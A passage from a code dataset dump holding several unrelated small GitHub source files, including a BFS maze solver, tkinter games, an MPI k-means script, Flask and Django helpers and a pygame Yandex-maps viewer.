Default value is localhost.\", nargs='?', const='localhost', default='localhost')\n #optional.add_argument('--influx_port', help=\"Specifies InfluxDB port. Default value is 8086.\", nargs='?', const='8086', default='8086')\n #required.add_argument('--influx_db', help=\"Specifies InfluxDB database to use. If it does no exsist, it will be created.\")\n #optional.add_argument('--influx_user', help=\"Set the path to the daemon pid file. The default value is root.\")\n #optional.add_argument('--influx_passwd', help=\"Set the path to the daemon pid file. The default value is root.\")\n\n optional.add_argument('--log_file', help=\"Set the path to the log file. The default value is %s\" % DEFAULT_LOG_FILE, nargs='?', const=DEFAULT_LOG_FILE, default=DEFAULT_LOG_FILE)\n optional.add_argument('--log_level', help=\"Set the log level. The default value is INFO\", nargs='?', const='INFO', default=DEFAULT_LOG_LEVEL)\n\n return argparser.parse_args()\n\ndef configure_process(daemon, args):\n \"\"\"\n Configure the daemon's stat groups and the stats processor via command line\n arguments.\n \"\"\"\n daemon.set_host(args.host)\n daemon.set_path(args.path)\n daemon.set_metric(args.metric)\n #_configure_prometheus_client(daemon, args)\n #_configure_metric_names(daemon, args)\n #_print_stat_groups(daemon)\n\ndef _configure_prometheus_client(daemon, args):\n \"\"\"\n Configure the daemon's stat prometheus client\n \"\"\"\n params = {}\n params['start_time'] = args.start\n params['end_time'] = args.end\n params['time'] = args.time\n params['time_range'] = args.time_range\n params['function'] = args.func\n daemon.set_host(args.host)\n daemon.set_query(args.query)\n daemon.set_metric(args.metric)\n demon.set_parameters(params)\n LOG.info(\"Collecting data from Prometheus Host %s \" % args.host)\n\ndef _configure_metric_names(daemon, args):\n \"\"\"\n Configure the daemon's stat name\n \"\"\"\n if args.metric is None:\n print >> sys.stderr, \"You must provide metric to query via the --metric command line argument.\"\n sys.exit(1)\n daemon.set_metric_name(args.metric)\n\ndef configure_logging_via_cli(args):\n \"\"\"\n Setup the logging from command line args.\n \"\"\"\n if args.log_file is None:\n args.log_file = DEFAULT_LOG_FILE\n\n parent_dir = os.path.dirname(args.log_file)\n if parent_dir and os.path.exists(parent_dir) is False:\n print(\"Invalid log file path: {}.\".format(args.log_file))\n sys.exit(1)\n\n if args.log_level is None:\n args.log_level = DEFAULT_LOG_LEVEL\n\n log_level = _log_level_str_to_enum(args.log_level)\n logging.basicConfig(filename=args.log_file, level=log_level, format='%(asctime)s:%(name)s:%(levelname)s: %(message)s')\n console = logging.StreamHandler()\n console.setLevel(logging.DEBUG)\n # set a format which is simpler for console use\n formatter = logging.Formatter('%(asctime)s:%(name)s:%(levelname)s: %(message)s')\n console.setFormatter(formatter)\n # add the handler to the root logger\n logging.getLogger('').addHandler(console)\n LOG.info(\"Logging Data collectors in file %s\" % args.log_file)\n\ndef read_config(options):\n \"\"\"\n reading configuration file\n \"\"\"\n configuration = dict()\n","repo_name":"cnleng/prometheus_data_collector","sub_path":"data_collectors_config.py","file_name":"data_collectors_config.py","file_ext":"py","file_size_in_byte":5871,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"73415254241","text":"\"\"\"\n\nbfs로 탐색을 하면서 벽을 부순 횟수를 최소화 하면 된다.\ncrash[i][j]: (i, j)에 도착할 때까지 벽을 부순 최소 
횟수\n\n\"\"\"\nimport sys\nfrom collections import deque\n\ninput = sys.stdin.readline\n\nM, N = map(int, input().rstrip(\"\\n\").split(\" \"))\nmaze = [list(map(int, input().rstrip(\"\\n\"))) for _ in range(N)]\ncrash = [[sys.maxsize for _ in range(M)] for _ in range(N)] # 벽을 부순 횟수 저장\n\ndx = [0, 0, -1, 1] # x좌표 이동\ndy = [-1, 1, 0, 0] # y좌표 이동\n\n\ndef bfs(x, y):\n queue = deque()\n queue.append([x, y])\n crash[y][x] = 0\n\n while queue:\n cur_x, cur_y = queue.popleft()\n for i in range(4):\n nx = cur_x + dx[i]\n ny = cur_y + dy[i]\n if (0 <= nx) and (nx < M) and (0 <= ny) and (ny < N):\n if maze[ny][nx] == 0: # 벽이 없으면 부수지 않고 이동 가능\n if crash[ny][nx] > crash[cur_y][cur_x]:\n crash[ny][nx] = crash[cur_y][cur_x]\n queue.append([nx, ny])\n else: # 벽이���면 부수고 이동 가능 (부순 횟수 +1)\n if crash[ny][nx] > crash[cur_y][cur_x] + 1:\n crash[ny][nx] = crash[cur_y][cur_x] + 1\n queue.append([nx, ny])\n\n\nbfs(0, 0)\nprint(crash[N - 1][M - 1])\n","repo_name":"ssun-g/solution","sub_path":"BOJ/python/1261.py","file_name":"1261.py","file_ext":"py","file_size_in_byte":1351,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"19513282911","text":"\n\nimport maya.cmds as cmds\nfrom .. import UI_Object\n\n########################################################################\nclass SaveShelf(UI_Object.UI):\n\t\"\"\"\n\tThis command saves the specified shelf (first argument) to the\n\tspecified file (second argument).\n\t\n\tNote that this command doesn't work well with controls that have\n\tmixed mel and python command callbacks. Also, because it saves the\n\tstate to a mel file, it does not work with callbacks that are python\n\tcallable objects.\n\t\"\"\"\n\t#----------------------------------------------------------------------\n\tdef __init__(self, name=None, **kwargs):\n\t\tparent = None\n\t\tif kwargs.has_key(\"qtParent\"):\n\t\t\tparent = kwargs.pop(\"qtParent\")\n\t\t\t\n\t\tif name == None:\n\t\t\tname = cmds.saveShelf(**kwargs)\n\t\t\tsuper(SaveShelf, self).__init__(name, **dict(qtParent=parent))\n\t\t\t\n\t\telse:\n\t\t\tif cmds.saveShelf(name, exists=True):\n\t\t\t\tsuper(SaveShelf, self).__init__(name)\n\t\t\telse:\n\t\t\t\tname = cmds.saveShelf(name, **kwargs)\n\t\t\t\tsuper(SaveShelf, self).__init__(name, **dict(qtParent=parent))","repo_name":"SGSMarkNA/DML_Tools","sub_path":"DML_Maya/Maya_GUI/MiscUI/SaveShelf.py","file_name":"SaveShelf.py","file_ext":"py","file_size_in_byte":1027,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"31958756151","text":"__author__ = 'ylwoi'\n\nfrom tkinter import *\n\nroot = Tk()\n\ncanvas = Canvas(root, width='300', height='300')\ncanvas.pack()\n\n# create a function that takes 1 parameter:\n# a list of [x, y] points\n# and connects them with green lines.\n# connect these to get a box: [[10, 10], [290, 10], [290, 290], [10, 290]]\n# connect these: [[50, 100], [70, 70], [80, 90], [90, 90], [100, 70],\n# [120, 100], [85, 130], [50, 100]]\n\nbox_list = [[10, 10], [290, 10], [290, 290], [10, 290],[10, 10]]\nlines_list = [[50, 100], [70, 70], [80, 90], [90, 90], [100, 70], [120, 100], [85, 130], [50, 100]]\n\ndef dot_connector(list):\n coord_list = []\n for i in range(len(list)):\n if i < (len(list)-1):\n draw = canvas.create_line(list[i][0],list[i][1],list[i+1][0],list[i+1][1])\n if i == len(list)-1:\n draw = 
canvas.create_line(list[i][0],list[i][1],list[0][0],list[0][1])\n\ndot_connector(box_list)\ndot_connector(lines_list)\n\nroot.mainloop()\n","repo_name":"jsdelivrbot/Ylwoi","sub_path":"week03/day_3/connect_the_dots.py","file_name":"connect_the_dots.py","file_ext":"py","file_size_in_byte":953,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"22885609485","text":"import logg\nimport calc\n\n\ndef input_integer(message, message_error):\n a = None\n while True:\n if a is None:\n try:\n a = int(input(message))\n break\n except ValueError:\n print(message_error)\n continue\n\n return a\n\n\ndef input_action(message, message_error):\n action = None\n while True:\n if action is None:\n val = input(message)\n if val in ['+', '-', '/', '*']:\n action = val\n break\n else:\n print(message_error)\n return action\n\ndef complex_menu_calc():\n ai = input_integer('введите действительную часть первого числа','Введите корректное число')\n aj = input_integer('введите мнимую часть первого числа','Введите корректное число')\n bi = input_integer('введите действительную часть второго числа','Введите корректное число')\n bj = input_integer('введите мнимую часть второго числа','Введите корректное число')\n\n x = complex(ai, aj)\n y = complex(bi, bj)\n\n action = input_action(\"Введите действие: ['+', '-', '/', '*']\", 'Введитте коррдействие')\n if action == '/' and bi == 0 and bj == 0 :\n print('НА 0 ДЕЛИТЬ НЕЛЬЗЯ')\n logg.log_warn(\"user tried to divide by zero\")\n else:\n print(f\"Результат: {act_rat_num(x,y,action)}\")\n\n\n\ndef rational_menu_calc():\n a = input_integer('Введите первое число', \"Введите корректное первое число\")\n b = input_integer('Введите второе число', \"Введите корректное второе число\")\n action = input_action(\"Введите действие: ['+', '-', '/', '*']\", 'Введитте коррдействие')\n\n if action == '/' and b == 0:\n print('НА 0 ДЕЛИТЬ НЕЛЬЗЯ')\n logg.log_warn(\"user tried to divide by zero\")\n else:\n print(f\"Результат: {act_rat_num(a, b, action)}\")\n\n\ndef act_rat_num(a, b, action):\n result = None\n\n if action == \"+\":\n result = calc.sum_fun(a, b)\n elif action == \"-\":\n result = calc.subtract_fun(a, b)\n elif action == \"*\":\n result = calc.multiply_fun(a, b)\n elif action == \"/\":\n result = calc.divide_fun(a, b)\n else:\n print(\"ERR\")\n\n logg.lod_action(f\"Calculated {a} {action} {b} = {result}\")\n return result\n","repo_name":"Natalia4e/Project_calculator","sub_path":"excep.py","file_name":"excep.py","file_ext":"py","file_size_in_byte":2678,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"14229334744","text":"\ndef numPairsDivisibleBy60(time):\n res = 0\n ref = {}\n for t in time:\n rem = t % 60\n if rem == 0:\n if 0 in ref:\n res = res + ref[0]\n elif (60 - rem) in ref:\n res = res + ref[60 - rem]\n\n ref[rem] = ref.get(rem, 0) + 1\n\n return res\n\nnumPairsDivisibleBy60([60,60,60])","repo_name":"Hrishi246/InterviewPractise","sub_path":"Misc/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":340,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"10417507844","text":"def findFourElements(arr, n, X):\r\n\tmp = {}\r\n\tfor i in range(n - 1):\r\n\t\tfor j in range(i + 1, n):\r\n\t\t\tmp[arr[i] + arr[j]] = [i, j]\r\n\tfor i in range(n - 1):\r\n\t\tfor j in range(i + 1, n):\r\n\t\t\tsumm = arr[i] + arr[j]\r\n\t\t\tif (X - summ) in mp:\r\n\t\t\t\tp = mp[X - summ]\r\n\t\t\t\tif 
(p[0] != i and p[0] != j and p[1] != i and p[1] != j):\r\n\t\t\t\t\tprint(arr[i], \", \", arr[j], \", \",\r\n\t\t\t\t\t\tarr[p[0]], \", \", arr[p[1]], sep=\"\")\r\n\t\t\t\t\treturn\r\narr = []\r\nn =int(input(\"Enter size\"))\r\nfor i in range(0,n):\r\n\ta=int(input())\r\n\tarr.append(a)\r\nX = int(input(\"enter a value for target:\"))\r\nfindFourElements(arr, n, X)\r\n\r\n","repo_name":"Anusha1A/python","sub_path":"target.py","file_name":"target.py","file_ext":"py","file_size_in_byte":588,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"6357221965","text":"#!/usr/bin/python\nfrom mrjob.job import MRJob\nfrom mrjob.step import MRStep\nimport itertools\nimport sys\n\nclass MRFrequentBigrams(MRJob):\n\n # define MRJob steps\n def steps(self):\n return [\n MRStep(\n mapper_init=self.mapper_init,\n mapper=self.mapper,\n combiner=self.combiner,\n reducer=self.reducer)\n ]\n\n # load top 10000 frequently appearing words into each memory of each mapper\n def mapper_init(self):\n self.top_unigrams = { k.strip(' \"'):v for v, k in (line.split(\"\\t\") for line in open('frequent_unigrams_10K.txt').read().strip().split('\\n')) }\n \n # emit cooccuring words with count = 1\n def mapper(self, _, line):\n # select only words from the 5-gram that exists in the top 10000\n words = [ word for word in line.lower().split('\\t')[0].split() if word in self.top_unigrams.keys() ]\n \n # find bigram co-occurrences\n cooccurences = {}\n for word1, word2 in itertools.combinations(words, 2):\n if word1 in cooccurences.keys():\n cooccurences[word1][word2] = cooccurences[word1].get(word2, 0) + 1\n else:\n cooccurences[word1] = {word2: 1}\n\n for k, v in cooccurences.iteritems():\n yield (k, v)\n\n # combine word cooccurrences from the same mapper and emit stripes\n def combiner(self, word, cooccurences):\n stripes = {}\n\n for stripe in cooccurences:\n for k, v in stripe.iteritems():\n stripes[k] = stripes.get(k, 0) + v\n\n yield (word, stripes)\n\n # emit word cooccurrences as stripes\n def reducer(self, word, cooccurences):\n stripes = {}\n\n for stripe in cooccurences:\n for k, v in stripe.iteritems():\n stripes[k] = stripes.get(k, 0) + v\n\n yield (word, stripes)\n\nif __name__ == '__main__':\n MRFrequentBigrams.run()","repo_name":"RajeshThallam/MIDS-W261-MACHINE-LEARNING-AT-SCALE","sub_path":"week5/hw5/FrequentBigrams.py","file_name":"FrequentBigrams.py","file_ext":"py","file_size_in_byte":1937,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"45504547047","text":"from flask import request\nfrom backend.criteria.schemas import criteria_form_schema\nfrom backend.models import Criteria\nfrom functools import wraps\n\n\n# Decorator to check if a criteria exists in github\ndef criteria_exists_in_github(f):\n @wraps(f)\n def wrap(*args, **kwargs):\n data = request.get_json()\n criteria = Criteria.query.filter_by(checkpoint_id=data[\"checkpoint_id\"],\n criteria_key=data[\"criteria_key\"]).first()\n\n if criteria:\n return f(*args, **kwargs)\n else:\n return {\n \"message\": \"Criteria does not exist\"\n }, 404\n\n return wrap\n\n\n# Decorator to validate criteria form data\ndef valid_criteria_form(f):\n @wraps(f)\n def wrap(*args, **kwargs):\n data = request.get_json()\n errors = criteria_form_schema.validate(data)\n\n if errors:\n return {\n \"message\": \"Missing or sending incorrect data to create a criteria. 
Double check the JSON data that it has everything needed to create a criteria.\"\n }, 500\n else:\n return f(*args, **kwargs)\n\n return wrap\n","repo_name":"bitprj/bit-backend","sub_path":"backend/criteria/decorators.py","file_name":"decorators.py","file_ext":"py","file_size_in_byte":1193,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"54"} +{"seq_id":"9866386083","text":"from model_example import *\nfrom glob import glob\nimport os\nfrom tqdm import tqdm\nfrom PIL import Image\nimport torchvision.transforms as transforms\n\ndevice = torch.device(\"cuda\")\nprint(f'Using {device} for inference')\n\nmodel = ClipBase32(num_classes=x)\npath_to_model = 'xxx'\n\nstate_dict = torch.load(path_to_model, map_location=torch.device('cpu'))['state_dict']\n\n# rename key\nfor key in list(state_dict.keys()):\n if key.startswith('backbone.'):\n new_key = key.replace('backbone.', '')\n else:\n new_key = key.replace('f.model.', 'classifier.')\n state_dict[new_key] = state_dict.pop(key)\n\nmsg = model.load_state_dict(state_dict, strict=False)\nmodel.eval().to(device)\n\nitems = []\npredict_ = []\nbasewidth = 224\n\npreprocess = transforms.Compose([\n transforms.ToTensor(),\n transforms.Resize(224),\n transforms.CenterCrop(224),\n transforms.Normalize(mean=[0.485, 0.456, 0.406],\n std=[0.229, 0.224, 0.225]),\n])\nwith torch.no_grad():\n img = Image.open(item_id).convert('RGB')\n img = preprocess(img).to(device)\n img = img.unsqueeze(0)\n\n out_model = model(img)\n output = torch.nn.functional.softmax(out_model, dim=1)\n index = output.data.cpu().numpy().argmax()\n","repo_name":"TrungThanhTran/image_classification_foundation_models","sub_path":"inference_examply.py","file_name":"inference_examply.py","file_ext":"py","file_size_in_byte":1233,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"7530379262","text":"from tkinter import *\r\nfrom tkinter import messagebox\r\n\r\n\r\ndef btn_click(num):\r\n global x,y\r\n global plyr_1,plyr_2\r\n from itertools import permutations\r\n set1=permutations([1,2,3])\r\n set2=permutations([4,5,6])\r\n set3=permutations([7,8,9])\r\n set4=permutations([1,4,7])\r\n set5=permutations([2,5,8])\r\n set6=permutations([3,6,9])\r\n set7=permutations([1,5,9])\r\n set8=permutations([3,5,7])\r\n \r\n for i in set1,set2,set3,set4,set5,set6,set7,set8:\r\n\t for j in list(i):\r\n\t\t player_1=all(elem in plyr_1 for elem in j)\r\n\t\t player_2=all(elem in plyr_2 for elem in j)\r\n\t\t if player_1==True:\r\n\t\t\t messagebox.showinfo(\"RESULT----\",\"Player 1 Won!!!\")\r\n\t\t\t break\r\n\t\t elif player_2==True:\r\n\t\t\t messagebox.showinfo(\"RESULT----\",\"Player 2 Won!!!\")\r\n\t\t else:pass\r\n if num == 1:\r\n if x%2==0:\r\n y=\"X\"\r\n plyr_1.append(num)\r\n print(plyr_1)\r\n elif x%2!=0:\r\n y=\"O\"\r\n plyr_2.append(num)\r\n print(plyr_2)\r\n\r\n b1.config(text=y,fg=\"white\")\r\n x=x+1\r\n\r\n if num == 2:\r\n if x%2==0:\r\n y=\"X\"\r\n plyr_1.append(num)\r\n print(plyr_1)\r\n elif x%2!=0:\r\n y=\"O\"\r\n plyr_2.append(num)\r\n print(plyr_2)\r\n\r\n b2.config(text=y,fg=\"white\")\r\n x=x+1\r\n\r\n if num == 3:\r\n if x%2==0:\r\n y=\"X\"\r\n plyr_1.append(num)\r\n print(plyr_1)\r\n elif x%2!=0:\r\n y=\"O\"\r\n plyr_2.append(num)\r\n print(plyr_2)\r\n\r\n b3.config(text=y,fg=\"white\")\r\n x=x+1\r\n\r\n if num == 4:\r\n if x%2==0:\r\n y=\"X\"\r\n plyr_1.append(num)\r\n print(plyr_1)\r\n elif x%2!=0:\r\n y=\"O\"\r\n plyr_2.append(num)\r\n print(plyr_2)\r\n\r\n 
b4.config(text=y,fg=\"white\")\r\n x=x+1\r\n\r\n if num == 5:\r\n if x%2==0:\r\n y=\"X\"\r\n plyr_1.append(num)\r\n print(plyr_1)\r\n elif x%2!=0:\r\n y=\"O\"\r\n plyr_2.append(num)\r\n print(plyr_2)\r\n\r\n b5.config(text=y,fg=\"white\")\r\n x=x+1\r\n\r\n if num == 6:\r\n if x%2==0:\r\n y=\"X\"\r\n plyr_1.append(num)\r\n print(plyr_1)\r\n elif x%2!=0:\r\n y=\"O\"\r\n plyr_2.append(num)\r\n print(plyr_2)\r\n\r\n b6.config(text=y,fg=\"white\")\r\n x=x+1\r\n\r\n if num == 7:\r\n if x%2==0:\r\n y=\"X\"\r\n plyr_1.append(num)\r\n print(plyr_1)\r\n elif x%2!=0:\r\n y=\"O\"\r\n plyr_2.append(num)\r\n print(plyr_2)\r\n\r\n b7.config(text=y,fg=\"white\")\r\n x=x+1\r\n\r\n if num == 8:\r\n if x%2==0:\r\n y=\"X\"\r\n plyr_1.append(num)\r\n print(plyr_1)\r\n elif x%2!=0:\r\n y=\"O\"\r\n plyr_2.append(num)\r\n print(plyr_2)\r\n\r\n b8.config(text=y,fg=\"white\")\r\n x=x+1\r\n\r\n if num == 9:\r\n if x%2==0:\r\n y=\"X\"\r\n plyr_1.append(num)\r\n print(plyr_1)\r\n elif x%2!=0:\r\n y=\"O\"\r\n plyr_2.append(num)\r\n print(plyr_2)\r\n\r\n b9.config(text=y,fg=\"white\")\r\n x=x+1\r\n\r\ny=\"\"\r\nx=2\r\nplyr_1=[]\r\nplyr_2=[]\r\n\r\nroot=Tk()\r\nroot.title(\"Welcome to The TIC-TAC-TOE dev by Snehal-Singh\")\r\nroot.wm_iconbitmap(\"tic-tac-toe_39453.ico\")\r\n\r\nl1=Label(root,text=\"Player 1 : X\",font=\"times 15\")\r\nl1.grid(row=0,column=0)\r\n\r\nl2=Label(root,text=\"Player 2 : O\",font=\"times 15\")\r\nl2.grid(row=0,column=1)\r\n \r\nb1=Button(root,bg=\"gray\",width=20,height=10,command=lambda: btn_click(1))\r\nb2=Button(root,bg=\"gray\",width=20,height=10,command=lambda: btn_click(2))\r\nb3=Button(root,bg=\"gray\",width=20,height=10,command=lambda: btn_click(3))\r\nb4=Button(root,bg=\"gray\",width=20,height=10,command=lambda: btn_click(4))\r\nb5=Button(root,bg=\"gray\",width=20,height=10,command=lambda: btn_click(5))\r\nb6=Button(root,bg=\"gray\",width=20,height=10,command=lambda: btn_click(6))\r\nb7=Button(root,bg=\"gray\",width=20,height=10,command=lambda: btn_click(7))\r\nb8=Button(root,bg=\"gray\",width=20,height=10,command=lambda: btn_click(8))\r\nb9=Button(root,bg=\"gray\",width=20,height=10,command=lambda: btn_click(9))\r\n\r\nb1.grid(row=1,column=0)\r\nb2.grid(row=1,column=1)\r\nb3.grid(row=1,column=2)\r\nb4.grid(row=2,column=0)\r\nb5.grid(row=2,column=1)\r\nb6.grid(row=2,column=2)\r\nb7.grid(row=3,column=0)\r\nb8.grid(row=3,column=1)\r\nb9.grid(row=3,column=2)\r\n\r\nroot.mainloop()\r\n","repo_name":"Snehal-Singh174/Tic-Tac-Toe","sub_path":"tic-tac-toe.py","file_name":"tic-tac-toe.py","file_ext":"py","file_size_in_byte":4507,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"6293681412","text":"from __future__ import print_function, absolute_import, division\n\nimport numpy as np\n\nfrom bc_exploration.sensors.sensor_util import bresenham2d\n\n\ndef test_bresenham2d():\n sx = 0\n sy = 1\n r1 = bresenham2d([sx, sy], [10, 5])\n r1_ex = np.array([[0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10], [1, 1, 2, 2, 3, 3, 3, 4, 4, 5, 5]]).T\n r2 = bresenham2d([sx, sy], [9, 6])\n r2_ex = np.array([[0, 1, 2, 3, 4, 5, 6, 7, 8, 9], [1, 2, 2, 3, 3, 4, 4, 5, 5, 6]]).T\n assert np.logical_and(np.sum(r1 == r1_ex) == np.size(r1_ex), np.sum(r2 == r2_ex) == np.size(r2_ex))\n\n\ndef main():\n test_bresenham2d()\n\n\nif __name__ == '__main__':\n 
main()\n","repo_name":"braincorp/bc_exploration","sub_path":"bc_exploration/sensors/test_sensor_util.py","file_name":"test_sensor_util.py","file_ext":"py","file_size_in_byte":638,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"74386773922","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Apr 30 15:57:16 2018\n\n@author: haider\n\"\"\"\n\nfrom mpi4py import MPI\nimport pandas as pd\nimport numpy as np\ncomm = MPI.COMM_WORLD\nrank = comm.Get_rank()\nsize = comm.Get_size()\nt_start = MPI.Wtime()\nMaster = 0\n\n\ncolum = 21\n#row for centroid\ncrow = 8\n#row for data\n#drow = 16\n\nif rank == Master:\n# dataSet = np.random.randint(10,size=[drow,colum])\n# #print(matrix)\n# slice1 = drow//size\n cantroid = np.random.randint(10,size=[crow,colum])\n \n df1 = pd.read_csv(\"Absenteeism_at_work.csv\",delimiter = \";\")\n dataSet = df1.values\n slice1 = dataSet.shape[0]//size\n \n for i in range(1,size):\n Sindx = i*slice1\n Eindx = (i+1)*slice1\n #for last complete send\n if i == size-1:\n chunkkk = dataSet[Sindx:dataSet.shape[0],:]\n comm.send(chunkkk,dest = i)\n \n else:\n \n chunkkk = dataSet[Sindx:Eindx,:]\n comm.send(chunkkk,dest = i)\n comm.send(cantroid,dest = i)\n #data at master postion\n recv1 = dataSet[0:slice1,:]\n recv2 = cantroid \n \n\n#print(slice)\n#print(df.shape)\n \n \nelse:\n\n#for data recv other than master \n recv1 = comm.recv(source=Master)\n#for centroid recv\n recv2 = comm.recv(source=Master)\n\n\nwhile True: \n result = np.zeros(shape = (recv1.shape[0],recv2.shape[0]), dtype = int)\n #column = 4\n#loop for data\n for m in range (0,recv1.shape[0]):\n#loof for centroid\n for q in range (0,crow):\n #loop for every column at one row\n for p in range (0,colum):\n result[m,q] = result[m,q] + (recv2[q,p] - recv1[m,p])**2\n result[m,q] = np.sqrt(result[m,q])\n \n#distance\n print(\"distance results\")\n print(result)\n\n#for membership matrix\n membr = np.zeros (shape = (recv1.shape[0],1), dtype = int)\n for n in range (0,recv1.shape[0]):\n #for minimum index finding for a valu\n membr[n,0] = np.argmin(result[n,:])\n# print(\"membership array\")\n# print(membr)\n \n \n fResult= np.zeros (shape = (recv2.shape[0],colum), dtype = int)\n for localMean in range (0,recv1.shape[0]):\n \n fResult[membr[localMean]] = fResult[membr[localMean]] + recv1[localMean]\n \n print(\"addition of all members\")\n print(fResult)\n\n if rank == Master:\n Globalmean= np.zeros (shape = (recv2.shape[0],colum), dtype = int)\n else:\n Globalmean = None\n \n comm.Reduce([fResult , MPI.INT],[Globalmean , MPI.INT])\n akhatyMembr = comm.gather(membr)\n if rank == Master:\n akhatyMembr = np.vstack(akhatyMembr)\n \n #count gather members for taking mean\n clusterSize = np.zeros (shape = (crow,1), dtype = int)\n for countgather in range (0,dataSet.shape[0]):\n clusterSize[akhatyMembr[countgather]] = clusterSize[akhatyMembr[countgather]] + 1\n \n #for centroid find\n Globalmeanfinal= np.zeros (shape = (recv2.shape[0],colum), dtype = int)\n for centroid in range (0,crow):\n #for avoiding the devision with 0\n if clusterSize[centroid] != 0:\n Globalmeanfinal[centroid] = Globalmean[centroid] /clusterSize[centroid]\n else:\n Globalmeanfinal = None\n\n temporary = recv2.copy()\n recv2 = comm.bcast(Globalmeanfinal)\n print(\"differnce\")\n #print(temporary, recv2)\n print (\"previous\")\n print (temporary)\n print (\"final\")\n print (recv2)\n if np.array_equal(temporary, recv2):\n if rank == Master:\n end_time = MPI.Wtime()\n total_time = end_time - 
t_start\n print(\"total time\")\n print(total_time)\n break\n \n \n","repo_name":"trojrobert/MPI-Distributed-Big-data-Computing_1-","sub_path":"K Means/Others/k means Haider.py","file_name":"k means Haider.py","file_ext":"py","file_size_in_byte":3696,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"17008817529","text":"from django.core.management.base import BaseCommand\n\nfrom accounts.models import User\nfrom accounts.views import create_user_profile\n\n\nclass Command(BaseCommand):\n help = \"Check and create user profile\"\n\n def create_profile(self):\n created_users = []\n users = User.objects.all()\n for user in users:\n status = create_user_profile(user)\n if status:\n self.stdout.write(\n self.style.SUCCESS('Created profile for \"%s\"' % user.username)\n )\n created_users.append(user.username)\n\n return created_users\n\n def handle(self, *args, **options):\n users = self.create_profile()\n\n self.stdout.write(\n self.style.SUCCESS(\n 'Successfully created profile for \"%s\" users' % len(users)\n )\n )\n","repo_name":"Anyesh/totoro","sub_path":"accounts/management/commands/createuserprofile.py","file_name":"createuserprofile.py","file_ext":"py","file_size_in_byte":852,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"15448313624","text":"import pygame\r\nimport requests\r\nimport sys\r\nimport os\r\nimport button\r\nimport gui\r\nimport textbox\r\nimport label\r\nimport math\r\npygame.init()\r\ncoords = input().split(\",\")\r\nresponse = None\r\nzom = 1\r\ntype = \"map\"\r\ndef lonlat_distance(a, b):\r\n\r\n degree_to_meters_factor = 111 * 1000\r\n a_lon, a_lat = a.split(\" \")\r\n b_lon, b_lat = b.split(\" \")\r\n a_lon,a_lat,b_lon,b_lat = float(a_lon),float(a_lat),float(b_lon),float(b_lat)\r\n radians_lattitude = math.radians((a_lat + b_lat) / 2.)\r\n lat_lon_factor = math.cos(radians_lattitude)\r\n dx = abs(a_lon - b_lon) * degree_to_meters_factor * lat_lon_factor\r\n dy = abs(a_lat - b_lat) * degree_to_meters_factor\r\n distance = math.sqrt(dx * dx + dy * dy)\r\n\r\n return distance\r\ndef get_json_request(tofind):\r\n geo_request = \"http://geocode-maps.yandex.ru/1.x/\"\r\n r = requests.get(geo_request, params={\"geocode\": tofind, \"format\": \"json\"})\r\n if r:return r.json()\r\n else: return \"B\"\r\ndef get_image(zoom,coords,type,points = \"\"):\r\n try:\r\n map_request = \"http://static-maps.yandex.ru/1.x/\"\r\n map_params = {\r\n \"ll\":\",\".join(coords),\r\n \"z\":zoom,\r\n \"l\":type,\r\n \"size\":\"600,450\"\r\n }\r\n if points: map_params[\"pt\"] = point\r\n response = requests.get(map_request,params = map_params)\r\n\r\n if not response:\r\n sys.exit(1)\r\n except Exception as a:\r\n print(a)\r\n sys.exit(1)\r\n\r\n # Запишем полученное изображение в файл.\r\n map_file = \"map.png\"\r\n try:\r\n with open(map_file, \"wb\") as file:\r\n file.write(response.content)\r\n except IOError as ex:\r\n print(\"Ошибка записи временного файла:\", ex)\r\n sys.exit(2)\r\n res = pygame.image.load(map_file)\r\n os.remove(map_file)\r\n return res\r\n\r\nimage = get_image(zom,coords,\"map\")\r\n# Инициализируем pygame\r\n\r\nscreen = pygame.display.set_mode((600, 450))\r\ngui = gui.GUI()\r\nmap_button = button.Button(pygame.Rect(10,10,100,25),\"карта\")\r\ngui.add_element(map_button)\r\nsat_button = button.Button(pygame.Rect(10,45,100,25),\"спутник\")\r\ngui.add_element(sat_button)\r\ngib_button = 
button.Button(pygame.Rect(10,80,100,25),\"гибрид\")\r\ngui.add_element(gib_button)\r\nfindbox = textbox.TextBox(pygame.Rect(300,10,300,50),\"\")\r\ngui.add_element(findbox)\r\nfind_button = button.Button(pygame.Rect(500,70,100,25),\"найти\")\r\ngui.add_element(find_button)\r\nclear_button = button.Button(pygame.Rect(500,105,100,25),\"стереть\")\r\ngui.add_element(clear_button)\r\nstat = label.Label(pygame.Rect(10,425,600,25),\"\",pygame.Color(\"white\"),pygame.Color(\"blue\"))\r\ngui.add_element(stat)\r\nindex_button = button.Button(pygame.Rect(500,140,100,25),\"индекс\")\r\ngui.add_element(index_button)\r\n# Рисуем картинку, загружаемую из только что созданного файла.\r\nlimit = [1,19]\r\n# Переключаем экран и ждем закрытия окна.\r\nrunning = True\r\nwalkx=450\r\nwalky=240\r\nwasfinded = \"\"\r\npoint = \"\"\r\nindex = False\r\nfind_button.font_color = pygame.Color(\"white\")\r\nmap_button.font_color = pygame.Color(\"white\")\r\nsat_button.font_color = 